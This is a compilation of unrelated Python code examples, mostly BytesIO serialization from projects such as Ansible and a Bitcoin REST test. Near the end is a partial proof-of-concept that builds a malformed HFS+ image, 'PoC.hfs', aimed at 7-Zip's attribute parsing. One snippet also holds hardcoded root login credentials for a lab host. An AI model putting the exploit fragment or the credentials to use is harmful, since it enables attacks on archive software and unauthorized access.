			self.__cache.write(data)
		self.__cache.seek(pos)

		data = self.__cache.readline()
		if size != -1:
			r = data[:size]
			self.__pos = pos + len(r)  # advance only past what was actually returned
		else:
			r = data
			self.__pos = pos + len(data)
		return r

	def readlines(self, sizehint=-1):
		pos = self.__pos
		self.__cache.seek(0, 2)
		self.__cache.write(self.wrapped.read())
		self.read_complete = True
		self.__cache.seek(pos)
		data = self.__cache.readlines(sizehint)
		self.__pos = self.__cache.tell()
		return data

	def __iter__(self):
		return self

	def __next__(self):
		line = self.readline()
		if line == "":
			raise StopIteration
		return line
	next = __next__

	xreadlines = __iter__

	def __repr__(self):
		return ("<%s at %s whose wrapped object = %r>" %
				(self.__class__.__name__, hex(abs(id(self))), self.wrapped))
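
A usage sketch for seek_wrapper (assumptions: the module-level len_of_seekable helper used by read() is available, and BytesIO stands in for a stream that cannot seek, such as a socket file):

import copy
from io import BytesIO

raw = BytesIO(b"first line\nsecond line\n")   # pretend this cannot seek
w = seek_wrapper(raw)
assert w.readline() == b"first line\n"
w.seek(0)                                     # rewind via the internal cache
assert w.read() == b"first line\nsecond line\n"
w2 = copy.copy(w)                             # shares the cache, keeps its own position
w2.seek(0)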
Exemple #43
0
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.pinned else 0
        data.write(Int(flags))

        data.write(self.peer.write())

        data.write(Vector(self.messages, Int))

        data.write(Int(self.pts))

        data.write(Int(self.pts_count))

        return data.getvalue()
Exemple #44
0
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.min else 0
        flags |= (1 << 1) if self.results is not None else 0
        flags |= (1 << 2) if self.total_voters is not None else 0
        flags |= (1 << 3) if self.recent_voters is not None else 0
        flags |= (1 << 4) if self.solution is not None else 0
        # solution and solution_entities share flag bit 4 in the TL schema
        flags |= (1 << 4) if self.solution_entities is not None else 0
        data.write(Int(flags))

        if self.results is not None:
            data.write(Vector(self.results))

        if self.total_voters is not None:
            data.write(Int(self.total_voters))

        if self.recent_voters is not None:
            data.write(Vector(self.recent_voters, Int))

        if self.solution is not None:
            data.write(String(self.solution))

        if self.solution_entities is not None:
            data.write(Vector(self.solution_entities))

        return data.getvalue()
Exemple #45
0
def _find_module_utils(module_name, b_module_data, module_path, module_args, task_vars, module_compression, async_timeout, become,
                       become_method, become_user, become_password, environment):
    """
    Given the source of the module, convert it to a Jinja2 template to insert
    module code and return whether it's a new or old style module.
    """
    module_substyle = module_style = 'old'

    # module_style is something important to calling code (ActionBase).  It
    # determines how arguments are formatted (json vs k=v) and whether
    # a separate arguments file needs to be sent over the wire.
    # module_substyle is extra information that's useful internally.  It tells
    # us what we have to look to substitute in the module files and whether
    # we're using module replacer or ansiballz to format the module itself.
    if _is_binary(b_module_data):
        module_substyle = module_style = 'binary'
    elif REPLACER in b_module_data:
        # Do REPLACER before from ansible.module_utils because we need to make
        # sure we substitute "from ansible.module_utils.basic import *" for REPLACER
        module_style = 'new'
        module_substyle = 'python'
        b_module_data = b_module_data.replace(REPLACER, b'from ansible.module_utils.basic import *')
    elif b'from ansible.module_utils.' in b_module_data:
        module_style = 'new'
        module_substyle = 'python'
    elif REPLACER_WINDOWS in b_module_data or re.search(b'#Requires \-Module', b_module_data, re.IGNORECASE):
        module_style = 'new'
        module_substyle = 'powershell'
    elif REPLACER_JSONARGS in b_module_data:
        module_style = 'new'
        module_substyle = 'jsonargs'
    elif b'WANT_JSON' in b_module_data:
        module_substyle = module_style = 'non_native_want_json'

    shebang = None
    # Neither old-style, non_native_want_json nor binary modules should be modified
    # except for the shebang line (Done by modify_module)
    if module_style in ('old', 'non_native_want_json', 'binary'):
        return b_module_data, module_style, shebang

    output = BytesIO()
    py_module_names = set()

    if module_substyle == 'python':
        params = dict(ANSIBLE_MODULE_ARGS=module_args,)
        python_repred_params = repr(json.dumps(params))

        try:
            compression_method = getattr(zipfile, module_compression)
        except AttributeError:
            display.warning(u'Bad module compression string specified: %s.  Using ZIP_STORED (no compression)' % module_compression)
            compression_method = zipfile.ZIP_STORED

        lookup_path = os.path.join(C.DEFAULT_LOCAL_TMP, 'ansiballz_cache')
        cached_module_filename = os.path.join(lookup_path, "%s-%s" % (module_name, module_compression))

        zipdata = None
        # Optimization -- don't lock if the module has already been cached
        if os.path.exists(cached_module_filename):
            display.debug('ANSIBALLZ: using cached module: %s' % cached_module_filename)
            zipdata = open(cached_module_filename, 'rb').read()
        else:
            if module_name in action_write_locks.action_write_locks:
                display.debug('ANSIBALLZ: Using lock for %s' % module_name)
                lock = action_write_locks.action_write_locks[module_name]
            else:
                # If the action plugin directly invokes the module (instead of
                # going through a strategy) then we don't have a cross-process
                # Lock specifically for this module.  Use the "unexpected
                # module" lock instead
                display.debug('ANSIBALLZ: Using generic lock for %s' % module_name)
                lock = action_write_locks.action_write_locks[None]

            display.debug('ANSIBALLZ: Acquiring lock')
            with lock:
                display.debug('ANSIBALLZ: Lock acquired: %s' % id(lock))
                # Check that no other process has created this while we were
                # waiting for the lock
                if not os.path.exists(cached_module_filename):
                    display.debug('ANSIBALLZ: Creating module')
                    # Create the module zip data
                    zipoutput = BytesIO()
                    zf = zipfile.ZipFile(zipoutput, mode='w', compression=compression_method)
                    # Note: If we need to import from release.py first,
                    # remember to catch all exceptions: https://github.com/ansible/ansible/issues/16523
                    zf.writestr('ansible/__init__.py',
                                b'from pkgutil import extend_path\n__path__=extend_path(__path__,__name__)\n__version__="' +
                                to_bytes(__version__) + b'"\n__author__="' +
                                to_bytes(__author__) + b'"\n')
                    zf.writestr('ansible/module_utils/__init__.py', b'from pkgutil import extend_path\n__path__=extend_path(__path__,__name__)\n')

                    zf.writestr('ansible_module_%s.py' % module_name, b_module_data)

                    py_module_cache = {('__init__',): (b'', '[builtin]')}
                    recursive_finder(module_name, b_module_data, py_module_names, py_module_cache, zf)
                    zf.close()
                    zipdata = base64.b64encode(zipoutput.getvalue())

                    # Write the assembled module to a temp file (write to temp
                    # so that no one looking for the file reads a partially
                    # written file)
                    if not os.path.exists(lookup_path):
                        # Note -- if we have a global function to setup, that would
                        # be a better place to run this
                        os.makedirs(lookup_path)
                    display.debug('ANSIBALLZ: Writing module')
                    with open(cached_module_filename + '-part', 'wb') as f:
                        f.write(zipdata)

                    # Rename the file into its final position in the cache so
                    # future users of this module can read it off the
                    # filesystem instead of constructing from scratch.
                    display.debug('ANSIBALLZ: Renaming module')
                    os.rename(cached_module_filename + '-part', cached_module_filename)
                    display.debug('ANSIBALLZ: Done creating module')

            if zipdata is None:
                display.debug('ANSIBALLZ: Reading module after lock')
                # Another process wrote the file while we were waiting for
                # the write lock.  Go ahead and read the data from disk
                # instead of re-creating it.
                try:
                    zipdata = open(cached_module_filename, 'rb').read()
                except IOError:
                    raise AnsibleError('A different worker process failed to create module file. '
                                       'Look at traceback for that process for debugging information.')
        zipdata = to_text(zipdata, errors='surrogate_or_strict')

        shebang, interpreter = _get_shebang(u'/usr/bin/python', task_vars)
        if shebang is None:
            shebang = u'#!/usr/bin/python'

        # Enclose the parts of the interpreter in quotes because we're
        # substituting it into the template as a Python string
        interpreter_parts = interpreter.split(u' ')
        interpreter = u"'{0}'".format(u"', '".join(interpreter_parts))

        now = datetime.datetime.utcnow()
        output.write(to_bytes(ACTIVE_ANSIBALLZ_TEMPLATE % dict(
            zipdata=zipdata,
            ansible_module=module_name,
            params=python_repred_params,
            shebang=shebang,
            interpreter=interpreter,
            coding=ENCODING_STRING,
            year=now.year,
            month=now.month,
            day=now.day,
            hour=now.hour,
            minute=now.minute,
            second=now.second,
        )))
        b_module_data = output.getvalue()

    elif module_substyle == 'powershell':
        # Powershell/winrm don't actually make use of shebang so we can
        # safely set this here.  If we let the fallback code handle this
        # it can fail in the presence of the UTF8 BOM commonly added by
        # Windows text editors
        shebang = u'#!powershell'

        exec_manifest = dict(
            module_entry=to_text(base64.b64encode(b_module_data)),
            powershell_modules=dict(),
            module_args=module_args,
            actions=['exec'],
            environment=environment
        )

        exec_manifest['exec'] = to_text(base64.b64encode(to_bytes(leaf_exec)))

        if async_timeout > 0:
            exec_manifest["actions"].insert(0, 'async_watchdog')
            exec_manifest["async_watchdog"] = to_text(base64.b64encode(to_bytes(async_watchdog)))
            exec_manifest["actions"].insert(0, 'async_wrapper')
            exec_manifest["async_wrapper"] = to_text(base64.b64encode(to_bytes(async_wrapper)))
            exec_manifest["async_jid"] = str(random.randint(0, 999999999999))
            exec_manifest["async_timeout_sec"] = async_timeout

        if become and become_method == 'runas':
            exec_manifest["actions"].insert(0, 'become')
            exec_manifest["become_user"] = become_user
            exec_manifest["become_password"] = become_password
            exec_manifest["become"] = to_text(base64.b64encode(to_bytes(become_wrapper)))

        lines = b_module_data.split(b'\n')
        module_names = set()

        requires_module_list = re.compile(to_bytes(r'(?i)^#\s*requires\s+\-module(?:s?)\s*(Ansible\.ModuleUtils\..+)'))

        for line in lines:
            # legacy, equivalent to #Requires -Modules powershell
            if REPLACER_WINDOWS in line:
                module_names.add(b'Ansible.ModuleUtils.Legacy')
            line_match = requires_module_list.match(line)
            if line_match:
                module_names.add(line_match.group(1))

        for m in set(module_names):
            m = to_text(m)
            mu_path = ps_module_utils_loader.find_plugin(m, ".psm1")
            if not mu_path:
                raise AnsibleError('Could not find imported module support code for \'%s\'.' % m)
            exec_manifest["powershell_modules"][m] = to_text(
                base64.b64encode(
                    to_bytes(
                        _slurp(mu_path)
                    )
                )
            )

        # FUTURE: smuggle this back as a dict instead of serializing here; the connection plugin may need to modify it
        module_json = json.dumps(exec_manifest)

        b_module_data = exec_wrapper.replace(b"$json_raw = ''", b"$json_raw = @'\r\n%s\r\n'@" % to_bytes(module_json))

    elif module_substyle == 'jsonargs':
        module_args_json = to_bytes(json.dumps(module_args))

        # these strings could be included in a third-party module but
        # officially they were included in the 'basic' snippet for new-style
        # python modules (which has been replaced with something else in
        # ansiballz) If we remove them from jsonargs-style module replacer
        # then we can remove them everywhere.
        python_repred_args = to_bytes(repr(module_args_json))
        b_module_data = b_module_data.replace(REPLACER_VERSION, to_bytes(repr(__version__)))
        b_module_data = b_module_data.replace(REPLACER_COMPLEX, python_repred_args)
        b_module_data = b_module_data.replace(REPLACER_SELINUX, to_bytes(','.join(C.DEFAULT_SELINUX_SPECIAL_FS)))

        # The main event -- substitute the JSON args string into the module
        b_module_data = b_module_data.replace(REPLACER_JSONARGS, module_args_json)

        facility = b'syslog.' + to_bytes(task_vars.get('ansible_syslog_facility', C.DEFAULT_SYSLOG_FACILITY), errors='surrogate_or_strict')
        b_module_data = b_module_data.replace(b'syslog.LOG_USER', facility)

    return (b_module_data, module_style, shebang)
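
The cache population above (write to a '-part' sibling, then os.rename() into place) is a general recipe for ensuring concurrent readers see either the old file or the complete new one, never a partial write. A standalone sketch of the pattern (hypothetical path, not Ansible API):

import os

def populate_cache_atomically(path, data):
    tmp = path + '-part'              # temp file on the same filesystem
    with open(tmp, 'wb') as f:
        f.write(data)
    os.rename(tmp, path)              # atomic replacement on POSIX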
Exemple #46
0
 def encode(self, fields, files):
     body = BytesIO()
     for chunk, _ in self.iter(fields, files):
         body.write(chunk)
     return self.content_type, body.getvalue()
Exemple #47
0
def dumpRaw(d):
    s = BytesIO()
    s.write(d)
    s.seek(0)
    return s.read()
Exemple #48
0
    def run_test(self):
        url = urllib.parse.urlparse(self.nodes[0].url)
        self.log.info("Mining blocks...")

        self.nodes[0].generate(1)
        self.sync_all()
        self.nodes[2].generate(100)
        self.sync_all()

        assert_equal(self.nodes[0].getbalance(), 250)

        txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
        self.sync_all()
        self.nodes[2].generate(1)
        self.sync_all()
        bb_hash = self.nodes[0].getbestblockhash()

        assert_equal(self.nodes[1].getbalance(),
                     Decimal("0.1"))  #balance now should be 0.1 on node 1

        # load the latest 0.1 tx over the REST API
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + txid + self.FORMAT_SEPARATOR + "json")
        json_obj = json.loads(json_string)
        vintx = json_obj['vin'][0][
            'txid']  # get the vin to later check for utxo (should be spent by then)
        # get n of 0.1 outpoint
        n = 0
        for vout in json_obj['vout']:
            if vout['value'] == 0.1:
                n = vout['n']

        #######################################
        # GETUTXOS: query an unspent outpoint #
        #######################################
        json_request = '/checkmempool/' + txid + '-' + str(n)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)

        #check chainTip response
        assert_equal(json_obj['chaintipHash'], bb_hash)

        #make sure there is one utxo
        assert_equal(len(json_obj['utxos']), 1)
        assert_equal(json_obj['utxos'][0]['value'], 0.1)

        #################################################
        # GETUTXOS: now query an already spent outpoint #
        #################################################
        json_request = '/checkmempool/' + vintx + '-0'
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)

        #check chainTip response
        assert_equal(json_obj['chaintipHash'], bb_hash)

        #make sure there is no utxo in the response because this outpoint has been spent
        assert_equal(len(json_obj['utxos']), 0)

        #check bitmap
        assert_equal(json_obj['bitmap'], "0")

        ##################################################
        # GETUTXOS: now check both with the same request #
        ##################################################
        json_request = '/checkmempool/' + txid + '-' + str(
            n) + '/' + vintx + '-0'
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(len(json_obj['utxos']), 1)
        assert_equal(json_obj['bitmap'], "10")

        #test binary response
        bb_hash = self.nodes[0].getbestblockhash()

        binaryRequest = b'\x01\x02'
        binaryRequest += hex_str_to_bytes(txid)
        binaryRequest += pack("i", n)
        binaryRequest += hex_str_to_bytes(vintx)
        binaryRequest += pack("i", 0)

        bin_response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + self.FORMAT_SEPARATOR + 'bin', binaryRequest)
        output = BytesIO()
        output.write(bin_response)
        output.seek(0)
        chainHeight = unpack("i", output.read(4))[0]
        hashFromBinResponse = hex(deser_uint256(output))[2:].zfill(64)

        assert_equal(
            bb_hash, hashFromBinResponse
        )  #check if getutxo's chaintip during calculation was fine
        assert_equal(chainHeight, 102)  #chain height must be 102

        ############################
        # GETUTXOS: mempool checks #
        ############################

        # do a tx and don't sync
        txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + txid + self.FORMAT_SEPARATOR + "json")
        json_obj = json.loads(json_string)
        vintx = json_obj['vin'][0][
            'txid']  # get the vin to later check for utxo (should be spent by then)
        # get n of 0.1 outpoint
        n = 0
        for vout in json_obj['vout']:
            if vout['value'] == 0.1:
                n = vout['n']

        json_request = '/' + txid + '-' + str(n)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(
            len(json_obj['utxos']), 0
        )  #no utxo is returned yet: without /checkmempool the mempool is not queried

        json_request = '/checkmempool/' + txid + '-' + str(n)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(
            len(json_obj['utxos']), 1
        )  #there should be an outpoint because it has just been added to the mempool

        #do some invalid requests
        json_request = '{"checkmempool'
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + self.FORMAT_SEPARATOR + 'json', json_request,
            True)
        assert_equal(
            response.status,
            500)  #must be a 500 because we sent an invalid json request

        json_request = '{"checkmempool'
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + self.FORMAT_SEPARATOR + 'bin', json_request,
            True)
        assert_equal(response.status,
                     500)  #must be a 500 because we sent an invalid bin request

        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos/checkmempool' + self.FORMAT_SEPARATOR + 'bin', '',
            True)
        assert_equal(response.status,
                     500)  #must be a 500 because we sent an invalid bin request

        #test limits
        json_request = '/checkmempool/'
        for x in range(0, 20):
            json_request += txid + '-' + str(n) + '/'
        json_request = json_request.rstrip("/")
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json',
            '', True)
        assert_equal(response.status,
                     500)  #must be a 500 because we are exceeding the query limit

        json_request = '/checkmempool/'
        for x in range(0, 15):
            json_request += txid + '-' + str(n) + '/'
        json_request = json_request.rstrip("/")
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json',
            '', True)
        assert_equal(response.status,
                     200)  #must be a 200 because this request stays within the limit

        self.nodes[0].generate(1)  #generate block to not affect upcoming tests
        self.sync_all()

        ################
        # /rest/block/ #
        ################

        # check binary format
        response = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + bb_hash + self.FORMAT_SEPARATOR + "bin", True)
        assert_equal(response.status, 200)
        assert_greater_than(int(response.getheader('content-length')), 80)
        response_str = response.read()

        # compare with block header
        response_header = http_get_call(
            url.hostname, url.port,
            '/rest/headers/1/' + bb_hash + self.FORMAT_SEPARATOR + "bin", True)
        assert_equal(response_header.status, 200)
        assert_equal(int(response_header.getheader('content-length')), 80)
        response_header_str = response_header.read()
        assert_equal(response_str[0:80], response_header_str)

        # check block hex format
        response_hex = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + bb_hash + self.FORMAT_SEPARATOR + "hex", True)
        assert_equal(response_hex.status, 200)
        assert_greater_than(int(response_hex.getheader('content-length')), 160)
        response_hex_str = response_hex.read()
        assert_equal(
            encode(response_str, "hex_codec")[0:160], response_hex_str[0:160])

        # compare with hex block header
        response_header_hex = http_get_call(
            url.hostname, url.port,
            '/rest/headers/1/' + bb_hash + self.FORMAT_SEPARATOR + "hex", True)
        assert_equal(response_header_hex.status, 200)
        assert_greater_than(
            int(response_header_hex.getheader('content-length')), 160)
        response_header_hex_str = response_header_hex.read()
        assert_equal(response_hex_str[0:160], response_header_hex_str[0:160])
        assert_equal(
            encode(response_header_str, "hex_codec")[0:160],
            response_header_hex_str[0:160])

        # check json format
        block_json_string = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + bb_hash + self.FORMAT_SEPARATOR + 'json')
        block_json_obj = json.loads(block_json_string)
        assert_equal(block_json_obj['hash'], bb_hash)

        # compare with json block header
        response_header_json = http_get_call(
            url.hostname, url.port,
            '/rest/headers/1/' + bb_hash + self.FORMAT_SEPARATOR + "json",
            True)
        assert_equal(response_header_json.status, 200)
        response_header_json_str = response_header_json.read().decode('utf-8')
        json_obj = json.loads(response_header_json_str, parse_float=Decimal)
        assert_equal(len(json_obj),
                     1)  #ensure that there is one header in the json response
        assert_equal(json_obj[0]['hash'],
                     bb_hash)  #request/response hash should be the same

        #compare with normal RPC block response
        rpc_block_json = self.nodes[0].getblock(bb_hash)
        assert_equal(json_obj[0]['hash'], rpc_block_json['hash'])
        assert_equal(json_obj[0]['confirmations'],
                     rpc_block_json['confirmations'])
        assert_equal(json_obj[0]['height'], rpc_block_json['height'])
        assert_equal(json_obj[0]['version'], rpc_block_json['version'])
        assert_equal(json_obj[0]['merkleroot'], rpc_block_json['merkleroot'])
        assert_equal(json_obj[0]['time'], rpc_block_json['time'])
        assert_equal(json_obj[0]['nonce'], rpc_block_json['nonce'])
        assert_equal(json_obj[0]['bits'], rpc_block_json['bits'])
        assert_equal(json_obj[0]['difficulty'], rpc_block_json['difficulty'])
        assert_equal(json_obj[0]['chainwork'], rpc_block_json['chainwork'])
        assert_equal(json_obj[0]['previousblockhash'],
                     rpc_block_json['previousblockhash'])

        #see if we can get 5 headers in one response
        self.nodes[1].generate(5)
        self.sync_all()
        response_header_json = http_get_call(
            url.hostname, url.port,
            '/rest/headers/5/' + bb_hash + self.FORMAT_SEPARATOR + "json",
            True)
        assert_equal(response_header_json.status, 200)
        response_header_json_str = response_header_json.read().decode('utf-8')
        json_obj = json.loads(response_header_json_str)
        assert_equal(len(json_obj), 5)  #now we should have 5 header objects

        # do tx test
        tx_hash = block_json_obj['tx'][0]['txid']
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + tx_hash + self.FORMAT_SEPARATOR + "json")
        json_obj = json.loads(json_string)
        assert_equal(json_obj['txid'], tx_hash)

        # check hex format response
        hex_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + tx_hash + self.FORMAT_SEPARATOR + "hex", True)
        assert_equal(hex_string.status, 200)
        assert_greater_than(int(hex_string.getheader('content-length')), 10)

        # check block tx details
        # let's make 3 tx and mine them on node 1
        txs = []
        txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),
                                               11))
        txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),
                                               11))
        txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),
                                               11))
        self.sync_all()

        # check that there are exactly 3 transactions in the TX memory pool before generating the block
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/mempool/info' + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(json_obj['size'], 3)
        # the size of the memory pool should be greater than 3x ~100 bytes
        assert_greater_than(json_obj['bytes'], 300)

        # check that there are our submitted transactions in the TX memory pool
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/mempool/contents' + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        for tx in txs:
            assert_equal(tx in json_obj, True)

        # now mine the transactions
        newblockhash = self.nodes[1].generate(1)
        self.sync_all()

        #check if the 3 tx show up in the new block
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + newblockhash[0] + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        for tx in json_obj['tx']:
            if not 'coinbase' in tx['vin'][0]:  #exclude coinbase
                assert_equal(tx['txid'] in txs, True)

        #check the same but without tx details
        json_string = http_get_call(
            url.hostname, url.port, '/rest/block/notxdetails/' +
            newblockhash[0] + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        for tx in txs:
            assert_equal(tx in json_obj['tx'], True)

        #test rest bestblock
        bb_hash = self.nodes[0].getbestblockhash()

        json_string = http_get_call(url.hostname, url.port,
                                    '/rest/chaininfo.json')
        json_obj = json.loads(json_string)
        assert_equal(json_obj['bestblockhash'], bb_hash)
Exemple #49
0
class FileAvoidWrite(object):
    """File-like object that buffers output and only writes if content changed.

    Use this class like a regular file when writing, to avoid touching the
    original file if the content hasn't changed. This is useful in scenarios
    where file mtime is used to invalidate caches or trigger new behavior.

    When writing to this file handle, all writes are buffered until the object
    is closed.

    Objects can be used as context managers.
    """
    def __init__(self, path):
        # type: (unicode) -> None
        self._path = path
        self._io = None  # type: Union[StringIO, BytesIO]

    def write(self, data):
        # type: (Union[str, bytes]) -> None
        if not self._io:
            if isinstance(data, text_type):
                self._io = StringIO()
            else:
                self._io = BytesIO()

        self._io.write(data)

    def close(self):
        # type: () -> None
        """Stop accepting writes and write file, if needed."""
        if not self._io:
            raise Exception('FileAvoidWrite does not support empty files.')

        buf = self.getvalue()
        self._io.close()

        r_mode = 'r'
        w_mode = 'w'
        if isinstance(self._io, BytesIO):
            r_mode = 'rb'
            w_mode = 'wb'

        old_content = None

        try:
            with open(self._path, r_mode) as old_f:
                old_content = old_f.read()
                if old_content == buf:
                    return
        except IOError:
            pass

        with open(self._path, w_mode) as f:
            f.write(buf)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.close()

    def __getattr__(self, name):
        # Proxy to _io instance.
        if not self._io:
            raise Exception('Must write to FileAvoidWrite before other '
                            'methods can be used')

        return getattr(self._io, name)
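
A usage sketch (hypothetical path): the second write produces identical content, so close() skips the write and the file's mtime is preserved for mtime-based build tools.

with FileAvoidWrite('/tmp/generated.h') as f:
    f.write('#define VERSION 42\n')
with FileAvoidWrite('/tmp/generated.h') as f:
    f.write('#define VERSION 42\n')   # same content: the file is not rewritten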
Exemple #50
0
    def write(self) -> bytes:
        b = BytesIO()
        b.write(Int(self.ID, False))

        # No flags

        b.write(Int(self.id))

        b.write(Long(self.access_hash))

        b.write(Int(self.date))

        b.write(Int(self.admin_id))

        b.write(Int(self.participant_id))

        b.write(Bytes(self.g_a_or_b))

        b.write(Long(self.key_fingerprint))

        return b.getvalue()
Exemple #51
0
    def add(self, name, itemData = None, last = False):
        #constants
        kHeadSize = 14
        kRecordHeaderSize = 16
        kAttrRecordType_Inline = 0x10

        #Space & add new node
        self.__hr.totalNodes += 1
        
        #Create Node
        node = BytesIO()
        node.write("\x00" * FileAttributes.NODE_SIZE)
        node.seek(0)

        #NODE #1    
        desc = BTNodeDescriptor()
        desc.numRecords = 1
        desc.kind = 0xFF #nodeType_leaf
        if last:
            desc.fLink = 0        
        else:
            desc.fLink = self.__hr.totalNodes
        node.write(desc)

        nodeDataOffset = sizeof(desc)    

        #data
        data = AttrHeaderData()
        keyString  = name   
        data.fileID = 0x31337 if itemData else 0xdeadbeef
        data.startBlock = 0
        data.nameLen = len(keyString)
        data.keyLen = kHeadSize - 2 + data.nameLen * 2
        node.write(data)

        #name string
        node.write( unicode(keyString).encode("utf-16be") )

        record = AttrHeaderRecord()
        record.recordType = kAttrRecordType_Inline
        record.dataSize = 16
        node.write(record)
        
        #itemData
        if itemData:
            node.write(itemData)

        #offsets: 7zip derives each record's size from the difference between
        #consecutive record offsets, so at least two offsets must be present
        offsets = struct.pack(">H", nodeDataOffset + kHeadSize + kRecordHeaderSize + data.keyLen + record.dataSize)  #offsetNext
        offsets += struct.pack(">H",nodeDataOffset) #offset
        node.seek(FileAttributes.NODE_SIZE - len(offsets))
        node.write(offsets)
        
        #add to rest of attributes
        node.seek(0)
        self.__content.write( node.read() )
Exemple #52
0
    def process(self):
        if (self.path == '/MACandLIP'):
            decode_json = self.LoadJson()
            self.mac_ip_dict[decode_json['MAC']] = decode_json['LIP']

            jdict = {'status': 'ok'}
            self.WriteJson(jdict)

        elif (self.path == '/MAC'):
            decode_json = self.LoadJson()
            mac = decode_json['MAC']

            jdict = {'MAC': '', 'LIP': ''}
            jdict['MAC'] = mac

            if mac in self.mac_ip_dict:
                jdict['LIP'] = self.mac_ip_dict[mac]

            self.WriteJson(jdict)
        elif (self.path == '/Image'):

            image = self.deal_formdata()

            jdict = {"category": "shape", "color": "0", "shape": "xxx"}
            jdict['shape'] = getShape(np.asarray(image))
            #jdict = {"category":"letter","color":"xxx","letter","xxx"}
            #jdict = {"category":"number","color":"xxx","number","xxx"}
            #jdict = {"category":"fail"}
            self.WriteJson(jdict)
        else:
            r, info = self.deal_post_data()
            print((r, info, "by: ", self.client_address))
            f = BytesIO()
            f.write(b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
            f.write(b"<html>\n<title>Upload Result Page</title>\n")
            f.write(b"<body>\n<h2>Upload Result Page</h2>\n")
            f.write(b"<hr>\n")
            if r:
                f.write(b"<strong>Success:</strong>")
            else:
                f.write(b"<strong>Failed:</strong>")
            f.write(info.encode())
            f.write(("<br><a href=\"%s\">back</a>" %
                     self.headers['referer']).encode())
            f.write(b"<hr><small>Powerd By: bones7456, check new version at ")
            f.write(
                b"<a href=\"http://li2z.cn/?s=SimpleHTTPServerWithUpload\">")
            f.write(b"here</a>.</small></body>\n</html>\n")
            length = f.tell()
            f.seek(0)
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.send_header("Content-Length", str(length))
            self.end_headers()
            if f:
                self.copyfile(f, self.wfile)
                f.close()
"""Friedrich Schotte, May 1, 2015 - May 7, 2015"""
from ftplib import FTP
from telnetlib import Telnet
from io import BytesIO
from struct import pack

data = ""
for i in range(0,10*1000/2):
    data += pack(">bbHIII",0x03,0x000,0x0001,0xF0FFB044,0x00000001,0x00000000)
    data += pack(">bbHIII",0x03,0x000,0x0001,0xF0FFB044,0x00000001,0x00000001)

f = BytesIO()
f.write(data)
f.seek(0)

ftp = FTP("pico25.niddk.nih.gov","root","root")
ftp.storbinary ("STOR /tmp/sequence.bin",f) 
ftp.close()

telnet = Telnet("pico25.niddk.nih.gov")
telnet.read_until("login: "******"root\n")
telnet.read_until("Password: "******"root\n")
telnet.read_until("# ")
telnet.write("/bin/cat < /tmp/sequence.bin > /dev/sequencer &\n")
telnet.read_until("# ")
telnet.write("exit\n")
transcript = telnet.read_all()
telnet.close()
Exemple #54
0
def generateExploit():
 #region header
    fw = file(r'PoC.hfs','wb')
    hfs = BytesIO()
    OVERFLOW_VALUE = 0x10040
    #set header
    header = HFSPlusVolumeHeader()
    memset(addressof(header),0,sizeof(header))
    #Setting up header
    memmove(header.Header,"H+",2)
    header.Version = 4
    header.fileCount = 1
    header.folderCount = 0
    header.blockSize = 1024
    header.totalBlocks = 0x11223344 #updated later
    header.freeBlocks  = 0x0
    
    blockSizeLog = HFS.blockSizeToLog(header.blockSize)    
    
    forkDataOffset = 1
    if header.blockSize <= 0x400:
       forkDataOffset = ( 0x400 / header.blockSize ) + 1
#endregion

#region attribute
    kMethod_Attr     = 3; #// data stored in attribute file
    kMethod_Resource = 4; #// data stored in resource fork

    #attributesFile offset        
    attributesOffset = forkDataOffset 
    print("attributesOffset : ",attributesOffset)
    attributes = FileAttributes()

    #SPRAY
    #for i in range(0,50):        
    #   attributes.add("X"*( (0x20 / 2)-1 ) )

    decmpfsHeader =  DecmpfsHeader()
    decmpfsHeader.magic = struct.unpack("I", struct.pack(">I",0x636D7066) )[0] #magic == "fpmc"
    decmpfsHeader.compressionType = struct.unpack("I", struct.pack(">I",kMethod_Resource) )[0]
